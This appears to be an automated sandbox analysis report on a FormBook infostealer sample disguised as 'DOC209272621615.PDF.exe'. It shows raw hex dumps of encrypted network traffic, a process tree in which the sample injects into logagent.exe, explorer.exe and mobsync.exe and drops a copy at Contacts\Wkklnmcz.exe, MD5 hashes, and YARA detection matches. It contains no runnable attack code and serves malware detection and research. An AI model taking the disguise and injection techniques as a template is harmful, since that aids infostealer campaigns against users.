E{)uExtA$
2021-12-01 15:23:21 UTC	803	IN	Data Raw: 36 24 27 bf 2e db 81 a0 6e f4 f9 cc 9d 69 8c 84 d8 04 1f c7 a7 ff 9b f1 b8 bf b0 96 55 32 5b f8 4a d7 f8 ae 29 3b 0f 6e 91 20 2d 8f 10 8d 06 cc 55 56 84 d8 9e 69 25 ec 1d ce b4 60 fe b5 a9 51 e8 a9 c7 12 53 74 a4 26 d7 9c 9b 1f 4d 7c fa 8c c3 bb dc b4 48 91 c8 d2 e9 1e d0 a3 78 09 35 b7 9f 83 b5 ab 6d 37 be e3 55 01 59 b5 dd 79 81 5c 2b 99 dc 45 d9 ec 8d ee ce 1f 59 68 09 8c 79 07 78 7d 96 55 73 ae 01 62 51 28 00 0e 90 e5 65 a5 f4 56 5c 90 86 a9 fb 2e 5e ae 79 df 53 a6 82 dc f6 3f 13 71 3d 7d b6 2c 2f e3 6a 82 22 73 28 f0 5e 9d 26 0f 7c ed 5c 43 ed 56 f1 33 22 cc 2e d8 12 f6 00 56 48 d4 79 74 aa 0e f1 33 8b ea df 4f a0 82 a9 51 28 01 d2 28 1a 40 22 6f 29 0b 0c b4 e3 85 22 6a c7 8d 3d 0f 74 66 dc 04 e7 c1 f9 c2 85 27 ef 4c 83 e1 1d 59 c2 30 7e f0 12 0e 8b Data Ascii: 6$'.niU2[J);n -UVi%`QSt&M|Hx5m7UYy\+EYhyx}UsbQ(eV\.^yS?q=},/j"s(^&|\CV3".VHyt3OQ((@"o)"j=tf'LY0~
2021-12-01 15:23:21 UTC	807	IN	Data Raw: 1a de 8c c8 97 5c 3c 8d 41 bf d3 be 32 ae d4 7d 6e 7b 6e 0f 9d 29 2c 1d a6 17 c7 0f 83 a5 ca d7 1f eb c3 45 81 a4 90 c5 4f 57 f7 42 7a 4b 92 b4 5e 37 0f 6b ba 24 cf 26 b1 38 e0 6a d6 0a 92 4b 58 fc fe 31 8d 7e 2b 39 67 85 21 e7 c9 07 6e 9a 5f 21 b0 fc b8 21 e5 59 67 01 99 57 d0 93 0d fb 09 77 81 d4 33 e6 9d e3 e0 0f 7b 12 fa 4c 64 28 bc 9f 03 a7 74 09 47 d7 fc 02 b1 88 f2 66 39 67 04 b9 73 be 32 a5 04 1f d5 9a 84 14 f0 c8 27 42 6b 65 b1 08 78 6d 37 be e3 55 01 80 36 bc 3f ff 1b 22 31 33 df 4b 9a 5a ca d7 88 4c 1b af f8 49 d4 73 6e 1b a3 35 61 a8 c7 4c 80 68 c3 ab 8a 51 26 48 b5 cc 5f 2d d7 05 6d 80 9e 0f 79 4a 15 87 db 81 3a 80 9c 02 d5 99 24 72 f9 f0 dd 84 e7 1c 62 39 ac 81 4b 13 f9 cc dc 00 dd 6f f2 36 10 05 69 60 cd b7 a6 6f 07 6e f0 32 5a 57 b6 a5 fa Data Ascii: \<A2}n{n),EOWBzK^7k$&8jKX1~+9g!n_!!YgWw3{Ld(tGf9gs2'Bkexm7U6?"13KZLIsn5aLhQ&H_-myJ:$rb9Ko6i`on2ZW
2021-12-01 15:23:21 UTC	811	IN	Data Raw: d9 83 5a 43 9e 81 a3 7e f6 31 18 9d 19 63 a9 f6 ad 0d f5 c2 c3 45 ab e1 93 46 8b 52 56 77 04 ef ee ba fc b8 21 e5 0a 35 bf 62 89 44 6c 14 f0 31 97 3e bb ce 1e 26 45 e2 ef f6 c8 d2 aa b3 d6 9d f6 cc b8 f3 e4 42 42 b1 e8 57 37 1b dc 87 50 5a 43 f5 2a 85 21 4c ce 6c cb d0 82 12 f5 a6 7d d7 43 c1 28 14 cf 50 7d 1d f5 c2 a9 e8 a9 51 b8 69 3e 5c c7 f9 c3 ba 50 58 c6 25 ba af 13 8c 85 7e 93 9c a7 a2 96 de 52 f4 a8 69 9b 1e 2f 7f 72 39 13 72 f4 96 bd ca 92 c6 32 a5 f4 9e 81 54 ea aa 87 ee 05 07 06 fc dd e2 4a cf 39 2c 78 f6 ba 52 c9 bc b1 f3 42 7d bc 7e f0 ca 92 c0 68 6a 19 63 a8 4a 7e db 0a 0e 4d 95 2e 05 e2 ec d3 78 d4 18 e1 c5 c1 bc f1 35 1d 59 c1 a0 86 ef 38 69 64 d7 73 c4 30 00 50 9d 0d 81 5f b6 54 47 cc 57 21 3b 38 6a 1e 65 d1 97 28 59 db 69 9c 31 53 eb 22 Data Ascii: ZC~1cEFRVw!5bDl1>&EBBW7PZC*!Ll}C(P}Qi>\PX%~Ri/r9r2TJ9,xRB}~hjcJ~M.x5Y8ids0P_TGW!;8je(Yi1S"
2021-12-01 15:23:21 UTC	816	IN	Data Raw: 50 cc 34 98 d1 3b a1 0f 7c 30 27 57 f2 b0 c0 88 ba ab e7 1c 26 48 67 da 0a 7d 8d 35 e6 f6 c6 c8 a6 a6 f8 95 59 c6 46 65 d1 3d a1 a6 2e 50 e5 17 54 f4 1e d7 88 2e 02 0a 20 a6 75 c1 cd 56 b0 dd 06 e2 66 d4 f4 03 92 4d 6b 96 aa a4 78 e1 46 07 66 9f 60 15 19 6e 7b c7 1c 23 b5 28 4c 9b e1 90 44 78 f6 ba 50 a5 fa 4f e0 55 6c 14 f0 29 4e 48 99 8f 48 57 bc b4 a0 6e ec c4 0b f2 3b b0 b2 8f 79 80 68 e9 a0 2d 38 b1 93 3f 70 a3 a6 be e4 fd 5d 1d f8 15 62 39 13 72 e2 2e b9 ef 4c 64 c8 b5 ca 23 f0 bb 31 99 ff 06 84 37 6e 94 09 2d 94 90 75 82 22 26 4c 73 85 ef 38 8d cb 12 4c 9b e1 85 9a b7 df ce 6a 12 5f c0 b2 cc 23 8d 35 1e 6d e5 4c 10 f1 f5 4f d5 41 43 1a 62 09 f1 f3 65 d1 7c 41 ff cb d2 17 d2 60 cd 5e dc 9a b7 df ce 6a c6 44 e3 a5 05 0d 7e 59 1f 7d fe 0c 3b c2 3f be Data Ascii: P4;|0'W&Hg}5YFe=.PT. uVfMkxFf`n{#(LDxPOUl)NHHWn;yh-8?p]b9r.Ld#17n-u"&Ls8Lj_#5mLOACbe|A`^jD~Y};?
2021-12-01 15:23:21 UTC	820	IN	Data Raw: 99 57 37 e7 82 04 0f 45 81 50 2e 8a bc 4b e6 3b fc bc e2 40 bd bd f5 3d 09 3b 1a f6 15 9a 9f 68 e1 d0 6b aa dc 00 9e e2 ec d3 22 16 fc 04 ef f0 bb e9 2f 80 de 54 f6 1c dc fb f4 a0 86 d0 a3 7e 10 7b 91 33 a0 ee d5 99 23 4a be cd b7 e4 e7 60 82 60 25 ea 2f 13 0e fc 11 03 64 d7 77 bd de f5 87 24 37 a6 6e 56 dc 14 86 48 c8 8b e3 55 01 a0 91 eb c6 25 46 c9 df 77 65 da 04 b2 2d c1 bf c4 eb 27 57 33 9d 6d 92 0e 8b 99 55 56 84 d8 9e 69 25 a9 9b 89 e1 50 96 55 32 5a dd 6e 0c be 32 a6 38 e0 f5 97 5f b4 5f 6d cb b1 e0 ca 54 43 8e 14 0f c3 c8 11 d3 33 1b 2a 4a 52 29 c4 c8 d2 eb ac 03 00 22 cd 78 7b 79 83 d1 b3 99 1a 95 d2 cb 1f 6d 6a a0 e7 60 32 79 38 81 a0 2f d4 78 a8 83 17 68 1e 78 a5 12 5a b6 e3 18 e6 e2 30 9c 8c fa c4 1a 2d 3e f3 67 d4 0f 7c 35 ac 64 27 7b 12 02 Data Ascii: W7EP.K;@=;hk"/T~{3#J``%/dw$7nVHU%Fwe-'W3mUVi%PU2Zn28__mTC3*JR)"x{ymj`2y8/xhxZ0->g|5d'{
2021-12-01 15:23:21 UTC	824	IN	Data Raw: c6 a5 ea ae f5 9b b8 f0 f6 76 fb 2e 01 74 17 97 97 28 39 f9 47 0f c2 11 2c f3 42 7d dd 89 5c c3 05 79 8c 29 4f 23 b5 22 27 06 ec 6d e4 04 5f b4 5f 0b 7d 7e 18 58 33 cd e6 e2 ec ca a1 18 19 dd 54 2f 6b 96 aa d8 46 64 d7 36 b6 0d 16 eb 56 48 13 65 12 7f 9b a0 bc 14 0a 09 54 26 58 89 4b 7d 96 14 0c 90 2e 05 a9 37 0b f2 6e f0 76 89 77 da a6 26 62 8d 41 45 bc bb df 60 32 a5 c3 6e 19 5f b4 5f 2b 10 ed ae d0 34 f7 af 13 cc de e6 75 92 c2 a7 a6 24 6d ae a2 8c 79 04 e6 ad 0c 10 c5 79 88 44 87 ee bb 29 c1 7b 97 5c c9 20 2d f0 b5 24 be 46 73 81 a0 d6 71 f3 bd 77 55 96 f4 66 a8 82 dd fb 51 d7 32 c5 45 c8 e9 a4 78 08 f1 52 2b 1e a3 0e b7 28 be 46 dc 29 2c 4b 58 6b cd ff fb 58 dd b6 5a da ff 9a 5d ae f9 99 1c 10 fa b0 f6 28 a9 04 a6 af bb 59 42 f6 45 f5 bf bb ce a4 f0 Data Ascii: v.t(9G,B}\y)O#"'m__}~X3T/kFd6VHeT&XK}.7nvw&bAE`2n__+4u$myyD){\ -$FsqwUfQ2ExR+(F),KXkXZ](YBE
2021-12-01 15:23:21 UTC	835	IN	Data Raw: e6 1c 98 5d 32 5a be bd 36 68 9c e5 ba 26 58 89 4b 7d 96 15 44 bd 5e 9d 26 0f d0 e6 77 6b e2 46 8c 7c 9e 69 74 3d ab 50 fe 9a d4 00 36 9b 1e 4e e5 73 be 46 73 10 6a 0e fc 11 05 69 24 e2 c6 a5 ea ae f5 9b b8 f0 f6 76 04 a6 f7 c3 c0 a2 f8 35 02 61 af ec 98 fc bc a0 3b 7a f2 7e 93 32 a5 8a 16 fc 5c 96 de f5 87 22 12 e1 10 05 29 c5 f1 bf 4f 23 b5 26 3c 7f e6 9c 44 0e 64 e7 60 a9 04 a7 2a 88 59 69 a4 4b 4a 96 3f 17 1c 76 04 a7 72 fa 5f 89 e9 fd 8d 7d 1d 56 5f b4 5f 2d 7f 72 39 13 72 97 0c 13 71 3d 7b 91 88 e4 71 10 15 1b c5 13 d4 aa 47 3c 73 3c f9 c8 57 2b 42 fd 36 e7 60 32 ef 8d 56 a0 3b 7a f2 7e 93 32 a5 8a ba 47 07 3b 7a f2 7e 95 f2 d0 66 dc 44 86 97 d0 92 4b 19 98 5a b2 e6 9c 44 0e 64 e7 60 a9 04 a7 2a 24 5f 1e e8 11 db 81 ca 3b 7a 5b 41 40 f0 36 74 3d ab Data Ascii: ]2Z6h&XK}D^&wkF|it=P6NsFsji$v5a;z~2\")O#&<Dd`*YiKJ?vr_}V__-r9rq={qG<s<W+B6`2V;z~2G;z~fDKZDd`*$_;z[A@6t=
2021-12-01 15:23:21 UTC	840	IN	Data Raw: c3 45 f5 3d cb a6 82 df cd b6 5a 41 00 dc be b5 67 d2 14 f0 c9 df 63 90 cd 59 48 67 da 0f 08 0e ff 26 5c 2b c9 54 50 5a 04 eb ec a1 ea cc 23 4a 6b 26 d4 fc 11 05 4d 6a 3d 72 39 7b 9e 69 68 99 5f 6f 77 0c 04 18 e7 9e 81 80 58 32 8e ca d3 49 50 2c 63 10 8e be 46 73 e7 77 42 09 74 ff db 05 ed a1 d4 8d 85 52 21 4f dc a4 48 79 8d 0d 96 de f1 7c 90 13 da a9 57 f7 4c 58 46 73 dc 77 6f 23 a1 b0 1d f4 58 e9 2f 13 06 2f 2c b4 01 dc ec 7c 03 24 bc e6 05 39 67 9f 60 0e ff 24 96 16 fc 04 f3 fd 5d 86 a7 3c 8c c3 e4 57 df db 91 88 ba 6f f8 89 4b e6 bc f7 2f 83 b5 62 59 fc df 48 ca 89 4b e6 6b 84 cf a5 71 7f e5 41 84 d8 05 1d c6 25 9a 19 17 68 1e 88 3d 1e 78 1d e0 85 55 cd fe 4c 73 2d de 4f a8 7d 69 10 6f 9b 27 34 a3 17 17 44 0c fb d1 68 9b 09 b2 10 f5 49 ce 6a 19 63 22 Data Ascii: E=ZAgcYHg&\+TPZ#Jk&Mj=r9{ih_owX2IP,cFswBtR!OHy|WLXFswo#X//,|$9g`$]<WoK/bYHKkqA%h=xULs-O}io'4DhIjc"
2021-12-01 15:23:21 UTC	856	IN	Data Raw: cc 37 18 e6 db 22 da 0b 2c c0 79 07 af 6d 9a 1a 25 f2 f8 c1 b4 e5 13 72 05 92 c3 ad 09 ff 91 1b 2a ba e2 98 0a fe 1c a8 d2 13 c8 59 6a d0 6d 6a 08 72 ff af e5 1f 57 42 09 8b 46 4a 4c 73 ae 1a d9 f7 38 96 95 c5 a2 b4 2b 12 09 43 ee 7c 6c 1f ee 0a be 7a 85 5e 95 5b 99 57 37 6c ef 5b c2 c6 b9 ec a9 c6 46 9c 8f 37 a2 fa b0 69 9f 30 bd 36 64 d8 05 d3 92 b4 4f d7 f2 b6 59 71 f3 ed a6 38 e2 43 fd 93 46 dc 04 6c ef 5b c2 c6 b9 ec a9 c6 46 a0 13 8d be b5 22 0f 83 2e 54 47 8c 39 98 9a da 3d 7d 6a b3 96 55 32 4a 96 ee c9 df 77 d2 62 2a 0b f0 61 06 bf cf a7 7c 43 fa b0 66 d8 3e f9 20 a6 28 d1 68 e5 58 e4 18 19 9c 61 b8 7b 16 85 a2 3e f3 ec c0 35 b7 27 b7 e5 c7 14 51 77 47 3c 71 93 0e 8b b9 2f d7 b1 e7 60 31 81 48 46 07 ad 85 64 5c 93 c5 0f 08 a1 fc 11 03 34 a0 91 32 Data Ascii: 7",ym%r*YjmjrWBFJLs8+C|lz^[W7l[F7i06dOYq8CFl[F".TG9=}jU2Jwb*a|Cf> (hXa{>5'QwG<q/`1HFd\42
2021-12-01 15:23:21 UTC	867	IN	Data Raw: ab 26 48 4a 13 4e 29 3b 0e bb ee d9 2c bb 74 74 ff 9b b6 d5 1a 5d 32 5a 4e dd 05 99 99 55 cd a1 4b f7 2f d3 2d 99 bc dc f0 73 f4 bc f1 33 21 f5 4b e1 c5 c3 12 5c 90 b9 d3 90 ea e3 14 e3 1e 7d 06 2f 88 6f b5 a9 e8 57 6b 92 cb 5c b7 fc d0 f8 fc 5b b1 93 32 a5 41 dc ec 7a 06 07 9e e2 45 59 ac 4f 78 57 68 26 b7 d9 f7 27 ca 0c 7e 03 ef bb da 07 e5 65 a5 05 fa a7 3c f8 41 75 8e 32 61 55 46 84 54 94 5a ca d3 1e 13 ad 7a d5 f7 c7 0e 80 29 d9 f7 37 6c bc e2 40 ed 6d 35 bc b4 a0 6f 7b 55 b3 0d 3d 7d 86 6f fa 4b 5a 35 e4 6d 98 df 9b 92 c2 33 56 b4 a0 6c d3 85 ab bb f5 49 eb 56 08 74 17 c7 4b 5a 35 b2 9f cf 27 32 5a be b8 af 7b ba da ff cb 22 b1 c0 35 1d 59 c2 3b 35 63 03 37 27 34 9c 78 cd dd 46 bf 39 07 6a c2 87 24 31 ad 0e 00 cd 5e d8 de 75 03 9b 1e 95 e2 fb 81 f2 Data Ascii: &HJN);,tt]2ZNUK/-s3!K\}/oWk\[2AzEYOxWh&'~e<Au2aUFTZz)7l@m5o{U=}oKZ5m3VlIVtKZ5'2Z{"5Y;5c7'4xF9j$1^u
2021-12-01 15:23:21 UTC	883	IN	Data Raw: ab e0 8d 74 74 ff cf 63 55 f0 b7 f7 4c 99 55 36 35 6b 69 25 1d a2 d0 e6 5c 64 d7 76 c3 8d 35 e2 52 0d 7a 1b 2a 0b 0d be 3c 8c c3 b9 e1 78 09 1e 28 55 32 5a d6 f5 c2 d3 6d 06 e8 48 6e 0f 7c 9f 03 bc 3f a8 12 c9 ed 45 c0 bf f3 94 50 e4 bf 23 b8 21 4c cb 7a f1 47 f0 c6 77 87 ee 96 41 a1 0f 7c ec 23 5d 54 dd 86 2c 40 4d e4 99 20 7d b5 dd 79 73 8d 04 77 17 54 50 5a 41 67 dc 0b 79 8c 37 d7 8d 3f 03 66 88 b8 56 fc dd 85 e0 83 75 ab 09 35 45 12 1f 20 25 46 c4 4b 3c 06 ed 52 ea d1 68 a0 c9 40 dc 94 c0 7d 95 a7 ff db c0 19 84 1a 9d 25 ba ee 96 49 11 81 40 ae 40 f4 40 7d 96 54 17 97 96 f2 1b 34 5b 48 71 ab 09 74 ff da 47 d9 ca d8 f9 25 7b 5b c8 d2 aa 20 8d 57 b6 35 72 39 ef c7 4b 58 30 57 be bd 66 55 3a e7 55 0b 7d c7 c4 c8 93 6a 46 59 30 d8 fa 4f 20 d2 29 45 c0 9f Data Ascii: ttcULU65ki%\dv5Rz*<x(U2ZmHn|?EP#!LzGwA|#]T,@M }yswTPZAgy7?fVu5E %FK<Rh@}%I@@@}T4[HqtG%{[ W5r9KX0WfU:U}jFY0O )E

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

back

Click to dive into process behavior distribution

Click to jump to behavior section

Behavior

Click to jump to process

System Behavior

Analysis Process: DOC209272621615.PDF.exe PID: 5616 Parent PID: 5268

General

Start time:	16:22:55
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\DOC209272621615.PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DOC209272621615.PDF.exe"
Imagebase:	0x400000
File size:	701952 bytes
MD5 hash:	E5D9DB9823FB854169E25FCECA42E804
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: logagent.exe PID: 4024 Parent PID: 5616

General

Start time:	16:22:57
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):
Commandline:	C:\Windows\System32\logagent.exe
Imagebase:
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: WerFault.exe PID: 2888 Parent PID: 5616

General

Start time:	16:23:02
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 2132
Imagebase:	0xcf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Wkklnmcz.exe PID: 5352 Parent PID: 3352

General

Start time:	16:23:11
Start date:	01/12/2021
Path:	C:\Users\user\Contacts\Wkklnmcz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Contacts\Wkklnmcz.exe"
Imagebase:	0x400000
File size:	701952 bytes
MD5 hash:	E5D9DB9823FB854169E25FCECA42E804
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Typical_Malware_String_Transforms, Description: Detects typical strings in a reversed or otherwise modified form, Source: C:\Users\user\Contacts\Wkklnmcz.exe, Author: Florian Roth
Antivirus matches:	Detection: 33%, ReversingLabs
Reputation:	low

Analysis Process: logagent.exe PID: 6664 Parent PID: 5352

General

Start time:	16:23:15
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\logagent.exe
Imagebase:	0x13d0000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: explorer.exe PID: 3352 Parent PID: 6664

General

Start time:	16:23:19
Start date:	01/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: Wkklnmcz.exe PID: 5368 Parent PID: 3352

General

Start time:	16:23:19
Start date:	01/12/2021
Path:	C:\Users\user\Contacts\Wkklnmcz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Contacts\Wkklnmcz.exe"
Imagebase:	0x400000
File size:	701952 bytes
MD5 hash:	E5D9DB9823FB854169E25FCECA42E804
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: mobsync.exe PID: 7152 Parent PID: 5368

General

Start time:	16:23:23
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\mobsync.exe
Imagebase:	0xb90000
File size:	93184 bytes
MD5 hash:	44C19378FA529DD88674BAF647EBDC3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
